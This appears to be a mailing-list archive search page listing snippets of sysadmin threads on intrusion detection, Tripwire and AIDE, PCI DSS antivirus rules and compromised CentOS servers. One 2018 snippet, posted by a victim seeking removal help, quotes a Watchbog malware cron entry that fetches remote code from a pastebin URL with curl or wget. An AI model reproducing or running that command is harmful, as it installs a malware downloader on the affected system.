Displaying 20 results from an estimated 4000 matches similar to: "PCI/DSS compliance on CentOS"
2010 Mar 04
8
Intrusion Detection
Hello all,
I have been exploring the various intrusion detection systems available for the Linux platform and was wondering what ones you all would recommend? I have used AIDE before and while it is extremely easy to setup, it does not support the ability to send alerts as files are changed (allows one to be aware of an intrusion almost immediately).
Thank you,
Dan Burkland
?
2009 Jan 22
14
Antivirus for CentOS? (yuck!)
Hi All,
Yes, I know, it's really really embarrassing to have to ask but I'm
being pushed to the wall with PCI DSS Compliance procedure
(http://en.wikipedia.org/wiki/PCI_DSS) and have to either justify why
we don't need to install an anti-virus or find an anti-virus to run on
our CentOS 5 servers.
Whatever I do - it needs to be convincing enough to make the PCI
compliance guy tick the
2018 Dec 15
7
CentOS 7.5 Linux box got infected with Watchbog malware
Hi,
Is there a way to find out how the CentOS 7.5 Linux box got infected with
malware?
Currently i am referring to
http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
to carry out the below steps and is done manually.
1)rm -fr /tmp/*timesyncc.service*
2)crontab -e -u apigee
delete the cron entry
*/1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget
2008 Dec 23
4
tripwire on centos 5
Does anybody use tripwire on centos 5? Has anybody checked that: http://www.linickx.com/archives/281/tripwire-2411-rpm-for-centos-redhat-rhel-4 on centos5?
M.
--
This message has been scanned for viruses and
dangerous content by MailScanner, and is
believed to be clean.
-------------- next part --------------
An HTML attachment was scrubbed...
URL:
2007 Sep 26
4
Intrusion Detection Systems
Situation: We are providing hosting services.
I've grown tired of the various kiddie scripts/dictionary attacks on
various services. The latest has been against vsftpd, on systems that I
can't easily control vs. putting strict limits on ssh. We simply have
too many users entering from too many networks many with dynamic IP
addresses.
Enter.... thinking about LIDS or Log Based
2019 Nov 14
4
how to know when a system is compromised
How do you know when a Linux system has been compromised??
Every day I watch our systems with all the typical tools, ps, top, who,
I watch firewall / IPS logs, I have logwatch setup and mailing daily
summaries to me and I dive deeper into logs if something looks suspicious.
What am I missing or not looking at that you security gurus are looking at?
I subscribe to the centos and SANS
2012 Feb 19
3
centos security
Any suggestions on what to run on a centos box to verify that the
server isn't compromised or being sniffed? Thanks!
2009 Nov 28
6
AIDE or OSSEC on CentOS 5.4 x86_64?
Starting with a fresh load and after I finish hardening the load
following the Center for Internet Security (CIS) guidance, I'm wondering
whether AIDE or OSSEC would be a better intrusion detection system.
I installed AIDE and did a quick test of AIDE and after initializing the
db and applying the recent cups update, I found that 1700+ files had
changed. Those are a lot of changes to wade
2005 Jan 13
3
Aggregating logs from numerous FreeBSD machines
Hi folks,
My stack of trusty FreeBSD servers always seems to be growing, and it's
getting to the point where the daily and security output mail is too much to
make good use of. I'm looking for suggestions for log monitoring and
aggregation tools, especially from a monitoring-for-security perspective.
If I had to imagine an ideal system, it would be a central server that
securely
2010 Aug 15
24
Xen patches merged to upstream Linux 2.6.36, plans for 2.6.37?
Hello,
It looks like upstream linux-2.6.git contains at least the following
xen related new features for Linux 2.6.36:
- Xen-SWIOTLB support (required for Xen PCI passthru and dom0)
- Xen PV-on-HVM drivers
- Xen VBD online dynamic resize of guest disks (xvd*)
Congratulations!
What are the plans for 2.6.37 merge window? I believe at least:
- Xen PCI frontend
Others? I''m going to
2007 Jul 18
3
Getting the session variables after a redirect_to
Hi!
I set some session variables on a login_controller and i want to access
them after a redirect_to (:controller => "auditor", action => "check").
The problem is that the session variable are comming empty in the
auditor view!!
I tough that session variables last trought all controllers...iam wrong?
Please tell me.
--
Posted via http://www.ruby-forum.com/.
2006 Jun 12
3
Check integrity or rootkits on remote server?
Hello,
when one has physical access to a computer, he
can run something like tripwire, with keys and
checksum on a separate, write-only media, to
verify the integrity of the system.
What if the system is a remote one (in my case
Centos 4.3 on a User Mode Linux VPS some hundred
of KMs from here)?
Does it still make sense to run tripwire remotely?
If yes, how, since you cannot plug a floppy or
2005 Jan 19
3
tripwire
Is there a redhat or contrib RPM for tripwire?
I looked and didn't find one, but may not have been looking in the
right place.
Zebee
2017 Nov 06
1
How to detect botnet user on the server ?
Another alternative is to use a FIMS/HIDS such as Aide (Advanced Intrusion Detection Environment), OSSEC or Samhain. Be prepared to learn a lot about what your OS normally does behind the scenes (and thus a fair amount of initial fine tuning to exclude those things). Aide seems to work well (I've seen only one odd result) and is quite granular. However, it is local system based rather than
2003 Dec 07
5
possible compromise or just misreading logs
I am not sure if I had a compromise but I am not sure I wanted some other
input.
I noticed in this in my daily security run output:
pc1 setuid diffs:
19c19
< 365635 -rwsr-xr-x 1 root wheel 204232 Sep 27 21:23:19 2003
/usr/X11R6/bin/xscreensaver
---
> 365781 -rwsr-xr-x 1 root wheel 205320 Dec 4 07:55:59 2003
/usr/X11R6/bin/xscreensaver
It was the only file listed and I didn't
2000 Aug 16
2
Tripwire and cron
I am trying to get tripwire 1.2 patch level 2 on Redhat 6.2 to run out
of cron and so far have failed miserably.
It runs fine from the command line so I know my configuration is ok, but
when it runs from cron it gets to Phase 3 and simply exits. It doesn''t
generate any error messages or leave any core files laying around.
2010 May 20
11
If a DomU was compramised..
If a DomU was compramised, could the Dom0 or other DomUs be compramised?
I guess I''m trying to work out how much isolated Xen gives..
Thanks
_______________________________________________
Xen-users mailing list
Xen-users@lists.xensource.com
http://lists.xensource.com/xen-users
2017 Nov 06
2
How to detect botnet user on the server ?
Hello guys,
Whats is the best way to identify a possible user using a botnet with php
in the server? And if he is using GET commands for example in other server.
Does apache logs outbound conections ?
If it is using a file that is not malicious the clam av would not identify.
Thanks
2005 Feb 16
2
YUM and Tripwaire
I am looking for a location where I can get tripwire to install and update via
YUM. I know this is not the most secure thing but with the amount of machines
that I have, I have not other choice. So far I have found
http://download.fedoralegacy.org/redhat/9/updates/SRPMS/
Does anyone know one for CentOS?
Thanks
----------------------------------------------------------------------
This mail
2006 Nov 01
8
aaf and stop words; query parser
I''ve been trying to implement acts_as_ferret in my latest project and ran into a snag. If I do a search for ''auditor state'' then the search works perfectly. If I include a stop word, as in ''auditor of state'', then I get no results. I''d prefer not to set stop words to nil and index everything.
The solution, that I have yet to attempt, is to use